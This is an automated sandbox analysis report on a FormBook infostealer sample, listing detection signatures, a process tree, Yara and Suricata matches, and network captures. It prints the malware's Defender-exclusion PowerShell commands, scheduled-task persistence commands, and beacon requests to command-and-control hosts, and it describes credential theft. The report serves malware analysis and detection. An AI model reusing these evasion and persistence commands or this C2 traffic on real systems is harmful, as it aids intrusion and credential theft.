Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ekte.exe

Overview

General Information

Sample name:ekte.exe
Analysis ID:1538477
MD5:a0f5d21ab28654f9310e591044950160
SHA1:2da8c07b8f8e3b1ff29cb2f7db8419642c0a42e5
SHA256:c74e38c2e961cbbc34e20669e3deb4b31beebc94824b096c88d8aad8b75c4dcf
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • ekte.exe (PID: 3408 cmdline: "C:\Users\user\Desktop\ekte.exe" MD5: A0F5D21AB28654F9310E591044950160)
    • powershell.exe (PID: 3520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • powershell.exe (PID: 3584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • schtasks.exe (PID: 3616 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • ekte.exe (PID: 3752 cmdline: "C:\Users\user\Desktop\ekte.exe" MD5: A0F5D21AB28654F9310E591044950160)
      • BuhvZTwGQCD.exe (PID: 2424 cmdline: "C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • findstr.exe (PID: 728 cmdline: "C:\Windows\SysWOW64\findstr.exe" MD5: 18F02C555FBC9885DF9DB77754D6BB9B)
          • BuhvZTwGQCD.exe (PID: 1564 cmdline: "C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1756 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • taskeng.exe (PID: 3828 cmdline: taskeng.exe {F5042694-6DBB-4431-8D77-CD30DFD414D8} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • eFDiSxeTfjUqTk.exe (PID: 3868 cmdline: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe MD5: A0F5D21AB28654F9310E591044950160)
      • powershell.exe (PID: 3932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 4008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 4084 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • eFDiSxeTfjUqTk.exe (PID: 3056 cmdline: "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" MD5: A0F5D21AB28654F9310E591044950160)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bed0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2f1b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x172d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.ekte.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          8.2.ekte.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e3b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x164d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          8.2.ekte.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            8.2.ekte.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f1b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x172d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ekte.exe", ParentImage: C:\Users\user\Desktop\ekte.exe, ParentProcessId: 3408, ParentProcessName: ekte.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", ProcessId: 3520, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ekte.exe", ParentImage: C:\Users\user\Desktop\ekte.exe, ParentProcessId: 3408, ParentProcessName: ekte.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", ProcessId: 3520, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe, ParentImage: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe, ParentProcessId: 3868, ParentProcessName: eFDiSxeTfjUqTk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp", ProcessId: 4084, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ekte.exe", ParentImage: C:\Users\user\Desktop\ekte.exe, ParentProcessId: 3408, ParentProcessName: ekte.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp", ProcessId: 3616, ProcessName: schtasks.exe
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\findstr.exe, ProcessId: 728, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ekte.exe", ParentImage: C:\Users\user\Desktop\ekte.exe, ParentProcessId: 3408, ParentProcessName: ekte.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", ProcessId: 3520, ProcessName: powershell.exe
            Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3520, TargetFilename: C:\Users\user\AppData\Local\Temp\spbxmlzn.23j.ps1

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ekte.exe", ParentImage: C:\Users\user\Desktop\ekte.exe, ParentProcessId: 3408, ParentProcessName: ekte.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp", ProcessId: 3616, ProcessName: schtasks.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T13:15:20.479155+020028554651A Network Trojan was detected192.168.2.22491673.33.130.19080TCP
            2024-10-21T13:15:44.341147+020028554651A Network Trojan was detected192.168.2.2249173185.174.173.2280TCP
            2024-10-21T13:16:07.187952+020028554651A Network Trojan was detected192.168.2.2249177162.0.238.24680TCP
            2024-10-21T13:16:20.496951+020028554651A Network Trojan was detected192.168.2.224918115.197.148.3380TCP
            2024-10-21T13:16:34.567266+020028554651A Network Trojan was detected192.168.2.2249185206.119.82.14880TCP
            2024-10-21T13:16:48.792562+020028554651A Network Trojan was detected192.168.2.224918915.197.148.3380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T13:15:35.537377+020028554641A Network Trojan was detected192.168.2.2249170185.174.173.2280TCP
            2024-10-21T13:15:39.177209+020028554641A Network Trojan was detected192.168.2.2249171185.174.173.2280TCP
            2024-10-21T13:15:40.619644+020028554641A Network Trojan was detected192.168.2.2249172185.174.173.2280TCP
            2024-10-21T13:15:57.582707+020028554641A Network Trojan was detected192.168.2.2249174162.0.238.24680TCP
            2024-10-21T13:16:00.822682+020028554641A Network Trojan was detected192.168.2.2249175162.0.238.24680TCP
            2024-10-21T13:16:02.679402+020028554641A Network Trojan was detected192.168.2.2249176162.0.238.24680TCP
            2024-10-21T13:16:12.243108+020028554641A Network Trojan was detected192.168.2.224917815.197.148.3380TCP
            2024-10-21T13:16:15.421025+020028554641A Network Trojan was detected192.168.2.224917915.197.148.3380TCP
            2024-10-21T13:16:17.343047+020028554641A Network Trojan was detected192.168.2.224918015.197.148.3380TCP
            2024-10-21T13:16:25.531397+020028554641A Network Trojan was detected192.168.2.2249182206.119.82.14880TCP
            2024-10-21T13:16:29.267849+020028554641A Network Trojan was detected192.168.2.2249183206.119.82.14880TCP
            2024-10-21T13:16:30.703523+020028554641A Network Trojan was detected192.168.2.2249184206.119.82.14880TCP
            2024-10-21T13:16:39.635129+020028554641A Network Trojan was detected192.168.2.224918615.197.148.3380TCP
            2024-10-21T13:16:42.788385+020028554641A Network Trojan was detected192.168.2.224918715.197.148.3380TCP
            2024-10-21T13:16:44.720576+020028554641A Network Trojan was detected192.168.2.224918815.197.148.3380TCP
            2024-10-21T13:16:53.831892+020028554641A Network Trojan was detected192.168.2.2249190208.91.197.2780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T13:15:35.537377+020028563181A Network Trojan was detected192.168.2.2249170185.174.173.2280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: ekte.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeAvira: detection malicious, Label: TR/Kryptik.oucnm
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeReversingLabs: Detection: 63%
            Multi AV Scanner detection for submitted file
            Source: ekte.exeReversingLabs: Detection: 63%
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: ekte.exeJoe Sandbox ML: detected
            Source: ekte.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: ekte.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BuhvZTwGQCD.exe, 0000000F.00000000.392786817.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp, BuhvZTwGQCD.exe, 00000014.00000000.430916878.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: findstr.pdb source: ekte.exe, 00000008.00000002.417831173.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, ekte.exe, 00000008.00000002.417831173.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404452776.0000000000519000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404444486.0000000000512000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626564118.000000000051F000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404459780.000000000051E000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626548218.0000000000514000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ekte.exe, ekte.exe, 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 00000012.00000002.424622705.0000000000B9C000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.417719669.0000000001FA0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.0000000002130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.414891316.0000000001E40000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\ekte.exeCode function: 4x nop then jmp 00CA275Bh0_2_00CA1E3F
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 4x nop then jmp 00A5202Bh10_2_00A5170F

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49167 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49174 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49183 -> 206.119.82.148:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49184 -> 206.119.82.148:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49176 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49187 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49173 -> 185.174.173.22:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49189 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49170 -> 185.174.173.22:80
            Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.22:49170 -> 185.174.173.22:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49182 -> 206.119.82.148:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49172 -> 185.174.173.22:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49179 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49185 -> 206.119.82.148:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49178 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49190 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49186 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49180 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49177 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49181 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49175 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 185.174.173.22:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49188 -> 15.197.148.33:80
            Performs DNS queries to domains with low reputation
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeDNS query: www.guldeu.xyz
            Source: Joe Sandbox ViewIP Address: 162.0.238.246 162.0.238.246
            Source: Joe Sandbox ViewIP Address: 15.197.148.33 15.197.148.33
            Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
            Source: Joe Sandbox ViewASN Name: ITLDC-NLUA ITLDC-NLUA
            Source: C:\Windows\SysWOW64\findstr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3180000[1].zipJump to behavior
            Source: global trafficHTTP traffic detected: GET /7qh8/?o0I8bJWh=30gz3aeCGXts4Q76IE+H941JnGeso7u8ST9k2gxA0wQlWv8qAc7eS7l6bdvqrf9uLD1EZ4RKxD3BFAyB/gyNnMcHzfUP1SI6JZ3kLHzdYP32mYCFOTVusz8SPvQZ&IzCDX=JREpwHC8S HTTP/1.1Host: www.deikamalaharris.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2021/sqlite-dll-win32-x86-3340000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /2017/sqlite-dll-win32-x86-3180000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
